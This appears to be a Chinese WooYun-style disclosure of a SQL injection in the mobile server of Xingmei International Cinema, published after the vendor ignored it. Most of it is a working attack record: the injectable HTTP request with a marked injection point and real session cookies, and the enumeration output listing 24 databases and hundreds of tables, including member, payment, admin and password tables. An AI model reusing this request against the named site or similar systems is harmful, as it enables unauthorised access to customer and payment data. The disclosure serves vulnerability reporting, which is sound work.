2015-12-21: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-02-04: 厂商已经主动忽略漏洞,细节向公众公开
星美国际电影城手机端服务器,存在sql注入。
GET /include/showing_ajax.php?cinema_id=*&date_str=2015-12-20&film_id_str=001105952015,001205952015,001405952015,001905952015&op=get_search_showing_list&return_type=json HTTP/1.1Cookie: Hm_lpvt_636ba4c238f25f3f8b5fe3c8aad97ded=1450615961; Hm_lvt_636ba4c238f25f3f8b5fe3c8aad97ded=1450615961; _cityid=1001; _selectCinema_id=XM20003402; _selectCinema_aid=108693; PHPSESSID=i7ijhp9hpqq3mav1hkgbvunh97Host: m.ixingmei.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*
available databases [24]:[*] cms[*] information_schema[*] mysql[*] performance_schema[*] pl_account_db[*] pl_ad_db[*] pl_app_db[*] pl_common_db[*] pl_general_db[*] pl_hot_db[*] pl_im_db[*] pl_image_db[*] pl_mc_db[*] pl_mobile[*] pl_movie_db[*] pl_openfire_db[*] pl_quartz_db[*] pl_sender_db[*] pl_star_db[*] pl_user_db[*] pl_visit_db[*] sns[*] ucenter[*] webistrano_development
carriage_to |cms_active_count |cms_active_log |cms_addon_activity |cms_addon_chimelong |cms_addon_cinema |cms_addon_cinema_copy |cms_addon_cinema_copy1 |cms_addon_film |cms_addon_hall |cms_addon_product |cms_addon_seat_area |cms_addon_show |cms_addon_showing |cms_addon_star |cms_addon_venue |cms_addon_video |cms_addonarticle |cms_addonimages |cms_addoninfos |cms_addonshop |cms_addonsoft |cms_addonspec |cms_admin |cms_admintype |cms_advancedsearch |cms_apply_flink |cms_arcatt |cms_arccache |cms_archives |cms_arcmulti |cms_arcrank |cms_arctiny |cms_arctype |cms_area |cms_banner |cms_bannertype |cms_channeltype |cms_co_htmls |cms_co_mediaurls |cms_co_note |cms_co_onepage |cms_co_urls |cms_district |cms_district_bak |cms_district_copy |cms_diyforms |cms_downloads |cms_erradd |cms_feedback |cms_flink |cms_flinktype |cms_freelist |cms_homepageset |cms_keywords |cms_log |cms_mail_order |cms_mail_title |cms_mail_type |cms_member |cms_member_address |cms_member_bak |cms_member_captcha |cms_member_company |cms_member_copy |cms_member_copy_20130702 |cms_member_feed |cms_member_flink |cms_member_friends |cms_member_group |cms_member_guestbook |cms_member_invite |cms_member_mobile_captcha |cms_member_model |cms_member_msg |cms_member_operation |cms_member_person |cms_member_person_copy |cms_member_pms |cms_member_snsmsg |cms_member_space |cms_member_stow |cms_member_stowtype |cms_member_tj |cms_member_type |cms_member_validate |cms_member_vhistory |cms_moneycard_record |cms_moneycard_type |cms_mtypes |cms_multiserv_config |cms_myad |cms_mytag |cms_payment |cms_plus |cms_pwd_tmp |cms_ratings |cms_scores |cms_search_cache |cms_search_keywords |cms_sgpage |cms_shops_delivery |cms_shops_orders |cms_shops_products |cms_shops_userinfo |cms_softconfig |cms_stepselect |cms_sys_enum |cms_sys_module |cms_sys_set |cms_sys_task |cms_sysconfig |cms_tagindex |cms_taglist |cms_test |cms_test_mobile |cms_tl_card_meno |cms_tl_customer |cms_tl_log |cms_uploads |cms_verifies |cms_vote |customer_care |db_access_log |db_access_order |db_access_register |db_channel |db_tencent_order |db_tencent_order_cache |email_mod |mc_admin_group |mc_admin_index |mc_admin_index_group |mc_admin_index_module |mc_admin_module |mc_admin_module_group |mc_agent_account |mc_fp_bookings |mc_fp_bookings_copy |mc_fund_report |mc_kiosk_cinema |mc_kiosk_status |mc_log |mc_msg_tpl |mc_msg_type |mc_pwd_history |mc_review_order |msg_mod |payment_mod |shipping_mod |show_book_order |show_ddt_data |show_detail |show_discount |show_order |show_order_log |show_ticket |show_type_subcat |sms_statsa |tc_activity_area |tc_activity_coupon |tc_activity_index |tc_activity_inip |tc_activity_invite |tc_activity_limit |tc_activity_lottery |tc_activity_member |tc_activity_miaosha |tc_activity_miaosha_admin_op_log |tc_activity_miaosha_item |tc_activity_miaosha_item_detail |tc_activity_miaosha_member |tc_activity_miaosha_rule |tc_activity_notice |tc_activity_order_detail |tc_activity_pois |tc_activity_renren |tc_activity_renren_pois |tc_activity_scope |tc_activity_show |tc_activity_vote |tc_balance_binding |tc_balance_info |tc_balance_log |tc_balance_type |tc_balance_user |tc_cb_error |tc_cinema_coupon |tc_cinema_order |tc_class_log |tc_company_lottery |tc_coupon_audit |tc_coupon_batch |tc_coupon_card |tc_coupon_gift_tbl |tc_coupon_index |tc_coupon_index_copy |tc_coupon_info |tc_coupon_return |tc_coupon_return_order |tc_coupon_scope |tc_coupon_temp |tc_coupon_type |tc_daily_showing_counter |tc_download_sta |tc_exchange_lifecard |tc_feedback |tc_fp_cinema |tc_fp_cinema_copy |tc_guide_index |tc_guide_record |tc_hall |tc_hiring |tc_ip_limit |tc_keyword_group |tc_keyword_index |tc_lockseats |tc_lottery_index |tc_lottery_info |tc_lottery_log |tc_lowest_price |tc_lucky_draw_log |tc_lucky_draw_winners |tc_max_hall |tc_member_activity |tc_member_bind |tc_member_city_log |tc_member_opt |tc_member_vote |tc_member_winners |tc_mol_member_ticket |tc_mol_member_ticket_lan |tc_movie_ticket |tc_movie_ticket_tmp |tc_msg |tc_msg_log |tc_new_activity_index |tc_new_activity_member |tc_newipiao_order |tc_op_account |tc_op_strategy_dimensional |tc_op_strategy_index |tc_op_strategy_info |tc_order |tc_order_fail |tc_order_fy |tc_order_ok |tc_order_product |tc_osgh_user_tbl |tc_payment_error |tc_payment_info |tc_payment_scene |tc_payment_type |tc_price_default |tc_price_model |tc_price_period_details |tc_price_period_index |tc_price_period_scope |tc_price_ploy_cal |tc_price_ploy_index |tc_price_ploy_scope |tc_price_purchase |tc_price_scope |tc_scores_log |tc_seat |tc_send_sms |tc_serial_allot |tc_serial_info |tc_setting |tc_showing |tc_showing_block |tc_showing_increment_update_log |tc_showing_tmp |tc_third_success_order |tc_third_ticket |tc_uid_from |tc_unicom_code |tc_user_bind |tc_verify_mobile |tc_xm_card_recharge_log |tc_zy_all_cinema |tc_zy_cinema |tc_zy_coupon |tc_zy_order |theme_banner_tbl |theme_index_tbl |ticket_count |travel_order |travel_order_product_bridge |travel_product |travel_product_price |youbang |---------------------------------+
过滤吧
未能联系到厂商或者厂商积极拒绝
漏洞Rank:8 (WooYun评价)
